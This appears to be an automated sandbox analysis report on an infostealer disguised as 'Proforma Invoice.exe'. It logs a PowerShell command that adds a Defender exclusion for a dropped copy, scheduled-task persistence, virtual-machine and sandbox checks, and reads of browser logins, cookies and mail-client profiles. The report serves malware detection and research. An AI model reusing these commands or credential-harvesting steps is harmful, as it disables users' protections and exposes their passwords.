Source: unknown	Process created: C:\Users\user\Desktop\Proforma Invoice.exe "C:\Users\user\Desktop\Proforma Invoice.exe"
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ebJpPhiwjcAviB" /XML "C:\Users\user\AppData\Local\Temp\tmp8D30.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ebJpPhiwjcAviB" /XML "C:\Users\user\AppData\Local\Temp\tmp8D30.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe	Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Proforma Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Proforma Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Proforma Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: Proforma Invoice.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5716:120:WilError_01
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Mutant created: \Sessions\1\BaseNamedObjects\yvSZwEJqePRQzBhnb
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3516:120:WilError_01

Source: Proforma Invoice.exe, VW/gs.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: ebJpPhiwjcAviB.exe.0.dr, VW/gs.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Proforma Invoice.exe.4c0000.0.unpack, VW/gs.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.Proforma Invoice.exe.4c0000.0.unpack, VW/gs.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.Proforma Invoice.exe.400000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 8.2.Proforma Invoice.exe.400000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 8.0.Proforma Invoice.exe.bd0000.5.unpack, VW/gs.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.0.Proforma Invoice.exe.bd0000.11.unpack, VW/gs.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.0.Proforma Invoice.exe.bd0000.9.unpack, VW/gs.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\Desktop\Proforma Invoice.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Proforma Invoice.exe, VW/gs.cs	.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: ebJpPhiwjcAviB.exe.0.dr, VW/gs.cs	.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Proforma Invoice.exe.4c0000.0.unpack, VW/gs.cs	.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Proforma Invoice.exe.4c0000.0.unpack, VW/gs.cs	.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.Proforma Invoice.exe.bd0000.5.unpack, VW/gs.cs	.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.Proforma Invoice.exe.bd0000.11.unpack, VW/gs.cs	.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.Proforma Invoice.exe.bd0000.9.unpack, VW/gs.cs	.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.Proforma Invoice.exe.bd0000.1.unpack, VW/gs.cs	.Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_004C9BFE push 380A0001h; ret	0_2_004C9C61
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_00F598E8 push esp; iretd	0_2_00F598E9
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_00F51C58 push ebx; iretd	0_2_00F51C7A
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F6DEC push eax; ret	0_2_053F6DED
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_00BD9BFE push 380A0001h; ret	8_2_00BD9C61
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_067818F7 push es; ret	8_2_06781910
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_067818AB push es; ret	8_2_067818C4
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06782177 push edi; retn 0000h	8_2_06782179
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06964791 pushfd ; iretd	8_2_0696479D
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06968AA0 push esp; retf	8_2_06968AAD

Source: initial sample	Static PE information: section name: .text entropy: 7.524828218449115
Source: initial sample	Static PE information: section name: .text entropy: 7.524828218449115

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior

Source: Yara match	File source: 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Proforma Invoice.exe PID: 7152, type: MEMORYSTR

Source: Proforma Invoice.exe, 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Proforma Invoice.exe, 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7156	Thread sleep time: -47882s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 6640	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 6648	Thread sleep count: 9495 > 30	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9281			Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Window / User API: threadDelayed 9495			Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 47882	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Proforma Invoice.exe, 00000000.00000002.418665405.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.426347057.000000000ADA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: O3OXnn329t8NqEmU6p6
Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: Proforma Invoice.exe, 00000008.00000002.646996145.0000000006850000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process token adjusted: Debug	Jump to behavior

Source: Yara match	File source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Proforma Invoice.exe PID: 7152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Proforma Invoice.exe PID: 1500, type: MEMORYSTR

Source: C:\Users\user\Desktop\Proforma Invoice.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Windows Analysis Report Proforma Invoice.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
Proforma Invoice.exe

Source: C:\Users\user\Desktop\Proforma Invoice.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

ID:	668067
Product:	CloudBasic
Start time:	10:23:18
Start date:	18.07.2022
Sample:	Proforma Invoice.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	bea52e8910c076f5720ac20970e48a10
SHA1:	42777245a3f79ea5b2bcf1ea48811111b1cc3529
SHA256:	8d5f8190ec870db510d2b95b830a07bf3c67d9996df775778dfa82b6c2bdd7b3
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Proforma Invoice.exe.log	ASCII text, with CRLF line terminators	334734FEF0BE6E3826004710EBCF7891	F4B3F06B3B2C9B95C973FBDE86A11BF4B08D7071	ACED9D81BAA81C6C745072292E4B501F26309653EE318B0823183ABD9B51BBE0
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	86C4A227C4D869A2BE66CF6D61FC20F0	6219C43447A14CD9A39A9F9D8CA3536151BCF758	93D3DF1CB161FEF87BE4940EC9DEC1B4CB0E862EFEB711746C384AE24B4E6ECB
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2qvo3yn.owk.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ks5oxpdh.knr.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\tmp8D30.tmp	XML 1.0 document, ASCII text	9B768330FF7E87787B67395058434C5C	D292244F2F519E1A56D6E31713F1102392FFE79A	6991984684CB56ABD1B207772DEFD79157D6D1543631D53A79C01D23052BA1E7
C:\Users\user\AppData\Local\VW\Proforma_Invoice.exe_Url_t0gf1ilcromh4xo3razml1b1abkwbdbz\1.0.0.0\j40r1j1p.newcfg	XML 1.0 document, ASCII text, with CRLF line terminators	0A211DC1DDB25EA8DE763A50AC2B84ED	A4EC9B02A3CB4DFB2A8D17A4D4519940D1E65D3F	1306138CC76C95715A56E2074AD8371F3477FD2E576ACDB756F638E70553AB56
C:\Users\user\AppData\Roaming\djcexenx.rlb\Chrome\Default\Cookies	SQLite 3.x database, last written using SQLite version 3032001	EA7F9615D77815B5FFF7C15179C6C560	3D1D0BAC6633344E2B6592464EBB957D0D8DD48F	A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	BEA52E8910C076F5720AC20970E48A10	42777245A3F79EA5B2BCF1EA48811111B1CC3529	8D5F8190EC870DB510D2B95B830A07BF3C67D9996DF775778DFA82B6C2BDD7B3
C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\Documents\20220718\PowerShell_transcript.287400.izphoHbJ.20220718102444.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	70815EBE804F753B9A677BB1E25137DD	7FC1233A605DFBD079501B510C2087A49B984A7A	1CA6785BBCA9AEEAEF78064E96E64841058DC04F131C3E5DA187795CC4B55246